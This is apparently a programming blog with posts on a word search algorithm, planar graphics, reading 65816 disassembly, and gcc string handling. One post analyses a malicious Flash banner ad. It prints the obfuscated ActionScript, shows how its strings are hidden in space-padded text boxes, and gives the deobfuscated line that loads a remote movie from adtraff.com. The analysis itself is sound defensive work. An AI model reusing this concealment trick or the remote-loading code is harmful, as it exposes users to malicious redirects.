2019-09-24

A Word Search Generator

A while ago I needed to generate a daily word search using a word list that was unique for each day.  I didn't find anything online so I invented my own algorithm.  It is designed to encourage words to overlap as much as possible.

The setup for the algorithm is very simple and a bit boring, so I'll just cover the basics here.  The two things we need before we begin are a list of words to put in the word search and the dimensions of the letter grid.  For my implementation, the dimensions and a file containing a whitespace-separated list of words were passed in as arguments.

The word list also needs one other, non-obvious bit of preparation.  You need to make sure that none of the words in the word list are substrings of any other words in the list.  Be sure to check for reverse matches as well.  For example, "emit" reversed is "time", which hides inside "times", so those two would be very confusing to search for.
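Here's a rough C sketch of that check; the helper name conflicts() is made up for illustration, and it assumes plain ASCII words shorter than 64 characters.

#include <string.h>

// Returns 1 if `needle` or its reverse appears anywhere inside `hay`.
static int conflicts(const char *needle, const char *hay) {
    char rev[64];
    size_t n = strlen(needle);

    if (strstr(hay, needle) != NULL)
        return 1;
    if (n >= sizeof rev)
        return 1;  // overly long word; just treat it as a conflict
    for (size_t i = 0; i < n; i++)
        rev[i] = needle[n - 1 - i];
    rev[n] = '\0';
    return strstr(hay, rev) != NULL;
}

// Call conflicts(words[i], words[j]) for every pair with i != j and
// drop (or flag) any word that conflicts with another.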

Then before we hit the main algorithm, we sort the word list by length, with the longest words first.  We then loop through all the words in the word list and attempt to insert them into the grid.  If we succeed, we mark the word as used so we can later print it out as part of the clue list.

for (word : words) {
  if (addWord(grid, word)) {
    word.wasUsed = true;
  }
}

To add a word to the grid, we first loop through every cell in the grid.  We check to see if the cell is blank or if the cell matches the first letter of our given word.  If either of these is true, we measure the score for that position.  Then we move on to the next cell.

addWord(grid: Grid, word: Word): bool {
  bestScore = 0;
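  // bestScore and the matches list are shared with measure() below
  // (e.g. globals or members); matches should also be cleared here for each new word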
  for (y := 0..grid.height) {
    for (x := 0..grid.width) {
      if (grid.cell(x, y) == Blank || grid.cell(x, y) == word[0]) {
        measure(grid, word, x, y);
      }
    }
  }
  // random best fit goes here
  ...
}

To measure the score, we try to place the word in the grid at that location in all directions.  We then calculate a score based on the number of intersections for a given direction.

measure(grid: Grid, word: Word, x: int, y: int) {
  for (dy : [-1, 0, 1]) {
    for (dx : [-1, 0, 1]) {
      if (dx == 0 && dy == 0) {  // no direction
        continue;
      }
      ex := x + (word.length - 1) * dx;
      ey := y + (word.length - 1) * dy;
      if (ex < 0 || ex >= grid.width ||
          ey < 0 || ey >= grid.height) {  // word doesn't fit
        continue;
      }
      score := 1;
      for (i := 0..word.length) {
        cell := grid.cell(x + i * dx, y + i * dy);  // next cell
        if (cell == word[i]) {  // matches word
          score++;
        } else if (cell != Blank) {  // word doesn't fit here at all
          score = 0;
          break;
        }
      }
      if (score > 0 && score >= bestScore) {  // does it fit, and are we among the best matches?
        if (score > bestScore) {
          bestScore = score;
          matches.clear();  // new tier of best scoring matches
        }
        matches.add(Match(x, y, dx, dy));
        if (dx && dy) {  // we want diagonals, so add twice
          matches.add(Match(x, y, dx, dy));
        }
      }
    }
  }
}

This is the core of the algorithm, so we should look at it a little closer.  We loop through all the directions, where dx and dy each take the values -1, 0, or 1.  If both dx and dy are 0, then that doesn't point in any direction, so we skip that case.  We calculate the end position of the word for the current direction and check to see if it fits on the grid.  If not, we skip that direction.

Next we calculate the score for that direction.  The score starts at 1, so that a placement with no intersections still beats the "doesn't fit" case.  Encountering a cell already containing a matching letter is worth an extra point.  This encourages intersecting words.  If we encounter a cell with a different letter, we reset the score to zero and move on, since the word doesn't actually fit there.

If the score is among the best scores, we add our current orientation to the list of matches.

What we end up with is a list of all the highest scoring orientations.  Given the choice between a horizontal or vertical match and a diagonal match, we would prefer the diagonal match.  Thus, we've added any diagonal matches to the high-score list twice.

Note that we haven't actually placed the word on the grid yet; we've just calculated a list of the best places to put it.

After we have tested every cell in the grid, we now have a list of possible places to put that word.  If we don't have any, that means the word doesn't fit anywhere in the grid and we should abandon that word and move on to the next.

If we do have a list of possibilities, we pick a random one and place the word into the grid.  Then we move on to the next word.
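As a rough C sketch (not the pseudocode above), the "random best fit" step might look like the following.  The Match struct, the flattened character grid, and the placeBest() name are all assumptions made for illustration.

#include <stdlib.h>  // rand

typedef struct { int x, y, dx, dy; } Match;

// Pick one of the equally good matches at random and write the word into the grid.
// Returns 1 if the word was placed, 0 if it didn't fit anywhere.
static int placeBest(char *grid, int width, const char *word,
                     const Match *matches, int matchCount) {
    if (matchCount == 0)
        return 0;  // no valid placement; skip this word
    const Match *m = &matches[rand() % matchCount];
    for (int i = 0; word[i] != '\0'; i++)
        grid[(m->y + i * m->dy) * width + (m->x + i * m->dx)] = word[i];
    return 1;
}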

Finally, after we have added all possible words to the grid, we loop through the grid and fill in any blanks with random letters.
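That last pass is just a loop over the flattened grid; a minimal sketch, assuming blanks are stored as spaces:

#include <stdlib.h>  // rand

static void fillBlanks(char *grid, int width, int height) {
    for (int i = 0; i < width * height; i++)
        if (grid[i] == ' ')               // blank cell
            grid[i] = 'a' + rand() % 26;  // any random letter
}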

Then you can output the grid and marked words.

One possible improvement is the inclusion of red herrings.  When filling in the blanks with random letters, you could use letters from the word list to make "almost" matches.  It's also trivial to make the grid a random shape.  Before you do anything else, fill the cells outside the shape you want with a special character so no words can be placed there.  Then print those cells as blanks in the final grid.

2019-02-15

Oldschool planar graphics and why they were a good idea

Oldschool planar graphics

If you ever work with old hardware, like writing an NES emulator or reverse engineering an old Amiga game, you will inevitably come across planar graphics modes.

These days, with loads of memory and huge color depths, graphics are stored sequentially.  It makes the most logical sense.  The red, green, and blue values for each pixel are just stored in an array, in some predefined order (RGB, BGR, whatever).  There may even be an alpha channel.

Video cards of yesteryear didn't have access to that much RAM, so direct color, requiring 3 or 4 bytes of RAM per pixel, was out of the question.

Those old video cards used a palette-based system instead.  There's a palette with the red, green, and blue values of each color.  Then the image data itself is just an array of indices into the palette.  With 256 colors, we can use a single byte per pixel.

This is all very straightforward so far.  However, even 256 colors was extravagant for some older hardware.

What if you only had 16 colors?

With 16 colors, we only need 4 bits per pixel for the indices.  That means a single byte holds 2 pixels on the screen.  This works out rather well, since the width of each video mode is always going to be an even number.  With 16 colors, images take up exactly half the space they would with 256 colors.  The only thing you'd really need to worry about is whether the low nibble (4 bits) is drawn first or the high nibble; that, of course, is up to the hardware to decide.  Regardless, the sequential palette-based system still works.
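For illustration, reading and writing a pixel in a packed 4-bit-per-pixel buffer might look like this in C.  This sketch assumes the low nibble holds the even-numbered pixel; real hardware may do the opposite.

static unsigned getPixel4(const unsigned char *buf, int i) {
    unsigned char b = buf[i / 2];
    return (i & 1) ? (b >> 4) : (b & 0x0f);  // odd pixels live in the high nibble
}

static void setPixel4(unsigned char *buf, int i, unsigned color) {
    unsigned char *b = &buf[i / 2];
    if (i & 1)
        *b = (*b & 0x0f) | (unsigned char)(color << 4);  // replace high nibble
    else
        *b = (*b & 0xf0) | (unsigned char)(color & 0x0f);  // replace low nibble
}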

32-colors - the problem child!

With 32 colors, things get difficult.  We technically only need 5 bits per pixel for the indices, but you cannot really cut up an array of bytes into 5-bit chunks easily.  You could pad it, so that each byte contains the index, but now you're wasting 3 bits per pixel.  That's a lot of space to be wasting.

You could try to cram it all together, so the first 5 bits of the first byte represent the first pixel, and the top 3 bits represent the bottom 3 bits of the second pixel, and the bottom 2 bits of the second byte represent the top 2 bits of the second pixel, and so on.  This is a disaster.  Addressing individual pixels is now a total nightmare.
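To see why, here's a sketch of what just reading one pixel out of a tightly packed 5-bit buffer looks like, assuming the packing order described above (and ignoring the read past the end of the buffer for the very last pixel):

static unsigned getPixel5Packed(const unsigned char *buf, int i) {
    int bit  = i * 5;      // absolute bit offset of this pixel
    int byte = bit >> 3;   // byte containing the first bit
    int off  = bit & 7;    // bit offset inside that byte
    // the 5 bits may straddle two bytes, so read both and shift
    unsigned w = buf[byte] | ((unsigned)buf[byte + 1] << 8);
    return (w >> off) & 0x1f;
}

Writing a pixel is even messier, since you have to mask and merge across the byte boundary.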

So our options are waste space, or make addressing suck.

Planes to the rescue!

This is where planar graphics come in to save the day.  Instead of trying to pack all the bits of the indices together, we spread them out across planes. 

A plane is a 1 bit per pixel array.  So any byte of a plane controls 8 pixels.  For 32-colors, we need 5 bits per pixel, so we need 5 planes.

The first plane contains the lowest bits of all pixels.  The second plane contains the second lowest bits of all pixels, and so on.  So to modify the 3rd pixel on the screen, you would modify bit 3 of the first byte of every plane.

It's a bit more complicated than sequential storage, but it's still easy to address a specific pixel (byte = position / 8, bit = position & 7), and it saves a ton of RAM.  Imagine a 320x200 screen with 32 colors.  If we had padded each pixel out to a byte, it would require 64,000 bytes.  With planes, we only need (320 * 200 / 8) bytes per plane, which, with 5 planes, comes to just 40,000 bytes.
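Here's a hedged C sketch of pixel access across planes.  It assumes the lowest bit of each byte is the first pixel; real hardware such as the Amiga usually puts the leftmost pixel in the most significant bit, so adjust the bit index accordingly.

// planes[p] points to plane p; each plane is (width * height / 8) bytes.
static unsigned getPixelPlanar(unsigned char **planes, int numPlanes, int pos) {
    int byte = pos / 8;
    int bit  = pos & 7;
    unsigned color = 0;
    for (int p = 0; p < numPlanes; p++)
        color |= ((planes[p][byte] >> bit) & 1u) << p;  // plane p holds bit p of the index
    return color;
}

static void setPixelPlanar(unsigned char **planes, int numPlanes, int pos, unsigned color) {
    int byte = pos / 8;
    int bit  = pos & 7;
    for (int p = 0; p < numPlanes; p++) {
        if ((color >> p) & 1u)
            planes[p][byte] |= (unsigned char)(1u << bit);   // set bit in this plane
        else
            planes[p][byte] &= (unsigned char)~(1u << bit);  // clear bit in this plane
    }
}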

Another reason for planes

While planes were super useful for odd bit-length palette sizes like 32 colors, they were also used for expansion reasons.  Let's say we made a system with 16 colors, but intended to upgrade the system later on to 32 colors.

If we made the 16-color system use planar graphics instead of storing the indices in the low and high nibble of each byte, then going to 32-colors only requires adding a new plane somewhere in RAM. The older 16-color games would still work, they just wouldn't ever reference the 16 newer colors in the palette (assuming the new plane was initialized to 0 by the system).

With systems like the Amiga, software could even specify how many planes it wanted to use, and the hardware addressing doesn't even have to change to accommodate it.

2016-12-13

Understanding larger disassembly

This past weekend I was disassembling something and it struck me how few people knew how to do what I was doing.

So I figured I would quickly document the process of taking a chunk of disassembled code and putting it into a format that's easier to understand.

The disassembly I'm going to use for my examples is the same disassembly I was working on this weekend.  It is the music playing routines from some Apple IIgs software.

There is some knowledge that you should have before attempting to parse disassembly on any platform.

You should be familiar with the assembly language for your target platform.

Since this code ran on an Apple IIgs, that means you should know 65816 assembly.  If you know 6502 assembly, you're more than halfway there.  The 65816 is a 16-bit successor to the 6502, and is backwards compatible.  There are just a few more opcodes and addressing modes, as well as some additional flags for switching between 8-bit and 16-bit registers.

You should understand how hardware is used on your target platform.

For example, if you're disassembling software that draws to the screen, you should know how the various video modes work and how video memory is laid out.  Since we're disassembling a music player, we should know how the sound card works.

I'm not going to cover how the IIgs sound card works here; if you care, the Apple IIgs Technical Reference covers it.

Locate the code you're interested in.

This is one of the more difficult things to do.  You can't just disassemble an entire executable and hope to parse it all at once; it's far too big.  Instead you need to use some techniques to narrow down your search.

For example, if you're trying to figure out a file format for some file the program uses, you should search the disassembly for OS file calls and then work your way backwards from those calls.

If you're trying to find out how a program does some special graphical effect, then maybe check for code attached to the video blank interrupt (if it has one, again, know your platform).

For our example, we want to find the routine that's tied to the sound interrupt. This interrupt is fired whenever one of the soundcard's channels stops playing a note.  This is the natural place where you would advance the song and set up the soundcard to play the next note.  (Again, know your platform).

Searching through the disassembly I find the following:

00/3b84: a9 5c 98    lda  #$985c
00/3b87: 8f 2c 00 e1 sta  $e1/002c   ; Sound interrupt
00/3b8b: a9 3c 00    lda  #$003c
00/3b8e: 8f 2e 00 e1 sta  $e1/002e

This installs the sound interrupt routine.  It actually stores 5c 98 3c 00 into that memory location.  This is machine code that translates into the assembly "jmp $00/3c98".  So we now know that $3c98 in bank $00 is the sound interrupt routine that we want to understand.
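If the byte order isn't obvious, a quick C sketch shows how those two 16-bit stores lay the bytes down in memory.  This relies on running on a little-endian machine, just like the 65816 itself; the values are taken straight from the listing.

#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void) {
    unsigned char vector[4];
    uint16_t lo = 0x985c, hi = 0x003c;  // the two values the code stores
    memcpy(vector + 0, &lo, 2);         // little-endian store: 5c 98
    memcpy(vector + 2, &hi, 2);         // little-endian store: 3c 00
    for (int i = 0; i < 4; i++)
        printf("%02x ", vector[i]);     // prints: 5c 98 3c 00
    printf("\n");                       // $5c is the long-jump opcode, operand $00/3c98
    return 0;
}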

The code next to where the sound interrupt is installed also loads the music into a specific location in RAM, loads all the sample data into the sound RAM, and sets some variables.  You would want to disassemble this routine as well as it paints a clearer picture of what's happening with everything sound-related.  I won't do that here, but this is how I was able to better understand the sound interrupt routine.

Isolate the code you care about, once you've found it.

Now that we know the function we care about, we're going to isolate it and any small functions that it calls.  This helps get rid of noise.

I've got the code we care about uploaded here.  It's 528 lines of assembly.  That's a pretty healthy sized routine.

One thing I'll point out before we get into it.  There are two small routines at $3cd4 and $3cd9 that seem redundant and appear to return values from a table located at $00:0000 (normally a total red flag that something is horribly wrong).  Those zeroed addresses aren't what actually runs: the function that sets up the sound interrupt routine replaces them with calculated addresses into the music data.

That's another lesson.  Assembly programmers will modify program code instead of setting a variable, all just to save a memory access later on.

So how do we begin?  Do we just step through the assembly and see what it's doing?  Well, that's certainly an option, and for smaller routines, I have no problem doing this.  However, with longer routines, you'll want to do what you can to see the structure of the routine.

Visualize the structure of the routine.

I mean that literally.  The best way I've found to do this is to break the assembly up into what's known as "basic blocks".  A basic block is a chunk of contiguous assembly with only a single entry point (at the head) and a single exit point (at the tail).  You then draw connections between the blocks.

There is software that will automatically do this.  It's the first step in a higher-level decompiler.  However, that software is either specific to an architecture, or expensive, or both.  Luckily, it's rather easy to do it by hand.

I like to use GraphViz for this.  It's a simple command-line tool that takes a text file and generates a directed graph from it.

Here's the first two basic blocks from our assembly plotted:

digraph {
  node[shape="record" fontname="helvetica"];
  edge[fontname="helvetica" fontsize=9];
  m3c98 [label="$3c98|$3c9c"];
  m3c98 -> m3c9d;
  m3c9d [label="$3c9d|$3ca0"];
  m3c9d -> m3c9d [label="bmi"];
  m3c9d -> m3ca2;  
}


We start with a node called "m3c98".  This is the very first address in the routine.  It's prefixed with "m" just because node names cannot start with a number.  The node has a label with 2 records: the entry and exit addresses of the basic block.  This is immediately followed by a connection from this basic block to the next basic block.

You can see how I've also added a label to one of the edges.  If a jump between basic blocks is caused by a branch instruction, I'll put a label on it.  Unlabeled edges are implicit connections (m3c98 will automatically go to m3c9d without any branching).

Doing it this way is quick and easy: you can build the graph progressively as you go through the assembly looking for branches.  If you jump backwards into the middle of a basic block, it's trivial to split that basic block into two blocks and reassign the edges coming from the original block to come from the new block instead.

The end result is this graph:

Full function graph


You can view the full size graph here.

This graph is useful, but it's a bit noisy.  Our next step is to clean up the graph.  We do this in several ways.  The first is to remove any useless blocks.  It's very common to find a branch that leads directly to a jump.  This creates a useless block.  So you can go through the graph looking for any blocks that do this and remove them.  Redirect any edges pointing to such a block to the target of the removed block.

Another common thing, at least with this CPU architecture, is that there are branches leading to a basic block that does nothing but change between 8-bit and 16-bit mode and then jump to another block.  Since we don't really care about this too much (the disassembler cared more), we can treat these as empty blocks and remove them as well.

Finally, you'll find nodes that do nothing but clean up the stack and then RET.  Instead of jumping to these blocks, we should go through and replace them with unique RET blocks.  That way all of these exit points aren't routed to a couple of blocks and made to look like part of the structure.

After you make these cleanups, you'll have a graph that looks like this:

Cleaned up graph

See the full size graph here.

This is much cleaner and easier to follow.

Analyze the structure of the routine.


There are patterns in this graph that correspond to programming structures that you are familiar with.

For example, this pattern is an IF statement.


IF statement

At the end of the block at $3e11, there is some comparison done.  The bpl tells us that we skip a block if the result of some comparison was positive.

This can be structured as follows:

// at the end of the $3e11 block
if (result < 0) {
  // do $3e24 block
}
// do $3e27 block

The IF/ELSE statement is also easy to spot:

IF/ELSE statement

The beq tells us that if some result is zero, then we do the $40db block, otherwise we do the $40a9 block.

This can be structured as follows:

// at the end of the $40a5 block
if (result == 0) {
  // do $40db block
} else {
  // do $40a9 block
}
// do $40e7 block

Finally, loops (for loops, while loops, do/while loops) look like this:

WHILE loop


This is a case where a block points back at a previous block.  That's how you know it's a loop.  This particular one looks like a WHILE loop because the comparison happens in $3ec7 (i.e. first).  The bcs tells us there was most likely a comparison between two variables.

The structure then would be:

// $3ec7 block
while (something < somethingelse) {
  // 3ed3 block
}
// 3eda block

Using these simple patterns, it becomes rather easy to see the structure of the routine.

Convert disassembly into pseudocode


Now we begin the process of converting the disassembly into pseudocode.  This is a step-by-step process, and we use the basic block graph to help us organize the large structures.

For example, when you get to a basic block that has multiple other blocks from below pointing back up to it, you know it's the top of a loop.  You should open up a new block and mark it.  As you go along, you'll discover what type of loop it is and you can go back and clarify.

When you get to an IF/ELSE statement, you can scan through the tree and see where it will converge (or if it will converge).

You may end up with criss-crossed blocks, which cannot be represented cleanly without GOTOs.  This is especially true of older programs that were likely written in assembly in the first place.  I would recommend using GOTOs in your pseudocode, and only after you grasp what is happening, refactor it into a structured routine, duplicating code if necessary.

As you practice, you'll get better at spotting patterns in the structure.  Without much thought at all, I can see that the block at $3d67 is probably the same as the block at $4013.  They're likely both the bottom of the same FOR loop, and they're likely just duplicated because assembly programmers would do that.  At the very least, block $3d67 is a "continue" statement if block $4013 is indeed the bottom of a FOR loop.

The way I convert disassembly into pseudocode is to keep a list of the globals at the top of the file.
They start out looking something like:

uint8_t d_4356;  // 4356

Then as I figure out what d_4356 is, based on usage, I'll go rename it:

uint8_t numInst;  // 4356

Whenever I come across a new memory address, I'll search for it; if it exists, I use its name, and if it doesn't, I add it to the list.

For the opcodes themselves, I tend to build them out piece by piece.

Let's look at the beginning of the assembly.

It starts with a spinlock on soundCtl.  I'll look up what the high bit means and note it in a comment.

while (soundCtl & 0x80) {}  // wait for DOC to finish

Then it takes the result of soundCtl and ANDs it with $9f and stores it back into soundCtl.  Again, I'll look up what those bits do and comment it.

soundCtl &= 0x9f;  // DOC mode, no autoinc

and so on.  I'll have temporary variables for the accumulator and x and y indices, which will eventually get replaced with more complicated expressions to make them easier to follow.
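For example, a first pass over a few instructions might read like this.  It's a made-up fragment, not from the actual routine, and curInst and instTable are hypothetical names:

a = numInst;        // lda numInst
a = a - 1;          // dec a
x = a;              // tax
a = instTable[x];   // lda instTable,x
curInst = a;        // sta curInst

Once the pattern is clear, the temporaries collapse into:

curInst = instTable[numInst - 1];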

And that's it.  The final pseudocode (basically C) for the sound interrupt routine is here.

2010-01-07

Found Data

I'm always interested in found data. Little notes buried in executables and other strange places. These are usually intended to be seen only by those curious enough to fire up a hex editor, or do a little reverse engineering.

Here's an example. On the 68k Macintosh, executables usually only have a resource fork. All the code is stored in CODE blocks in the resource fork. So I was curious when I found that the 68k mac version of Shadowgate had a data fork. The data fork contained the following message:

Welcome to TMON!
TMON was written in the summer of 1984 by Waldemar Horwat when he was still 15 years old. Initially TMON didn't have the heap and file windows; these were added later. TMON was very valuable in debugging itself. The biggest problem in writing TMON was making sure that it will not affect the Macintosh system in undesirable ways. Although some side effects couldn't be avoided, most have been eliminated. How are you able to read this message, anyway? Do you have a disk sector reader?

It's interesting to note that Waldemar Horwat did some programming on Shadowgate. So my guess is that this is evidence that he used his TMON debugger on Shadowgate. Later revisions of Shadowgate have had this data fork removed. I also found it in Uninvited, which is another ICOM game. No sign of it in Deja Vu 1 or 2, but I haven't been able to find anything but the 1992 reissues of those games.

2008-01-31

Web Font Shorts

A posting on reddit led to a discussion on typefaces. In particular, one poster asked about the kerning of a word. Surprisingly, the kerning was perfect for me. I decided to compare it across the browsers I have access to.

Here's the kerning in Firefox on Linux (Stock Ubuntu Gutsy):



Notice how the A and V overlap? That's correct kerning.

Here's how it looks in Firefox on OSX Tiger:



Aside from the overly aggressive anti-aliasing, see how the kerning is incorrect between the A and V. It looks the same in Safari 3.

Here it is again in Firefox on Vista:



Same kerning error. Looks the same in IE7.


So Linux gets it right, OSX and Windows get it wrong. We've come quite far.

2007-11-02

Malicious Banner Ad

We ran into a malicious banner ad yesterday. People would randomly get redirected to a malicious website. You can imagine that it's a pretty tough thing to diagnose. It turned out to be a flash ad. I was able to disassemble the banner ad to see how it worked. The banner is "protected" and compressed, so hex editing the banner doesn't show any text.


Using Flare to decompile the actionscript in the swf, I found this snippet of code:


this[(a2.split(' ')).join('')]('m1', this[(a3.split(' ')).join('')]());
_root[(a4.split(' ')).join('')][(a5.split(' ')).join('')]((a6.split(' ')).join(''),(a7.split(' ')).join('')) == (a8.split(' ')).join('') && this.m1[(a0.split(' ')).join('')]((a1.split(' ')).join('') + '&u=' + (new Date()).getTime());


Definitely looks like someone is trying to hide something, but there wasn't anything else in the actionscript; certainly no getURLs or loadMovies.

I used the excellent swfmill program to convert the swf into xml. The output contains markup of every element in the swf. It was there that I found the source of a2, a3, a4, etc.


<DefineEditText objectID="5" wordWrap="0" multiLine="0" password="0" readOnly="1" autoSize="0" hasLayout="1" notSelectable="0" hasBorder="0" isHTML="0" useOutlines="0" fontRef="4" fontHeight="0" align="2" leftMargin="0" rightMargin="0" indent="0" leading="40" variableName="a0" initialText=" loadMovie">


There are text boxes (11 in all) all over the movie; they are all padded with hundreds of spaces at the beginning so they appear to be blank.

If you substitute out all splits and joins in the initial actionscript, you get the following:


createEmptyMovieClip('m1', getNextHighestDepth());
_url.substr(0,7)=="http://" &&
m1.loadMovie("http://adtraff.com/statsa.php?campaign=plentyup" + '&u=' + (new Date()).getTime());


So basically, this banner ad looks like a normal banner ad. However, each time you load it, it loads a movie clip from adtraff.com. Most of the time, this movie clip is blank. So you wouldn't notice a thing. However, sometimes the movie clip sent back from adtraff.com contains a getURL() that redirects the user to a malicious webpage like performanceoptimizer.com or malware-scan.com.

2007-09-06

char pointer versus char array

There are two basic ways to assign a string literal to a local variable.


char *p = "string";
char a[] = "string";


I was curious to see how gcc handles the two.

In both cases, "string" is put into .rodata. This means that with the first method, you must not modify the contents of "string".


p[3]='o'; // this causes a segfault.


So technically, the first method should be:


const char *p = "string";


With the pointer method, gcc will initialize the variable using the following:

mov dword ptr [ebp-8], pointer_to_string


Calling a function and passing p will result in:

mov eax,[ebp-8]
mov [esp], eax
call function_name


With the array method, however, gcc reserves space for the string on the stack and will initialize the variable like so:

mov eax, [pointer_to_string]
mov [ebp-15h], eax
mov eax, [pointer_to_string+4]
mov [ebp-11h],eax
mov eax,[pointer_to_string+8]
mov [ebp-0dh],eax
movzx eax,byte ptr [pointer_to_string+12]
mov [ebp-9],al


As you can see, it moves the string into the stack 4 bytes at a time. If the string is more than 64 bytes long, then gcc will actually create a call to memcpy:

lea ecx,[ebp-49h]
mov edx, pointer_to_string
mov eax,41h
mov [esp+8],eax
mov [esp+4],edx
mov [esp],ecx
call wrapper_to_memcpy


Regardless of how long the string is, passing the array to a function results in the following:

lea eax,[ebp-15h]
mov [esp],eax
call function_name


Passing the variable around is virtually identical for both array and pointer. However, initializing the variable takes a huge performance and space penalty for the array. Only use the array method if you intend to change the string; it takes up space on the stack and adds some serious overhead every time you enter the variable's scope. Use the pointer method otherwise.
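To make the distinction concrete, here's a small sketch. The crash described in the comment is what you'd typically see with gcc on Linux; strictly speaking, writing through the pointer is undefined behavior either way.

#include <stdio.h>

int main(void) {
    char a[] = "string";        // writable copy on the stack
    const char *p = "string";   // points at read-only data in .rodata

    a[3] = 'o';                 // fine: modifies the local copy
    printf("%s\n", a);          // prints "strong"

    /* ((char *)p)[3] = 'o'; */ // undefined behavior; typically segfaults
    return 0;
}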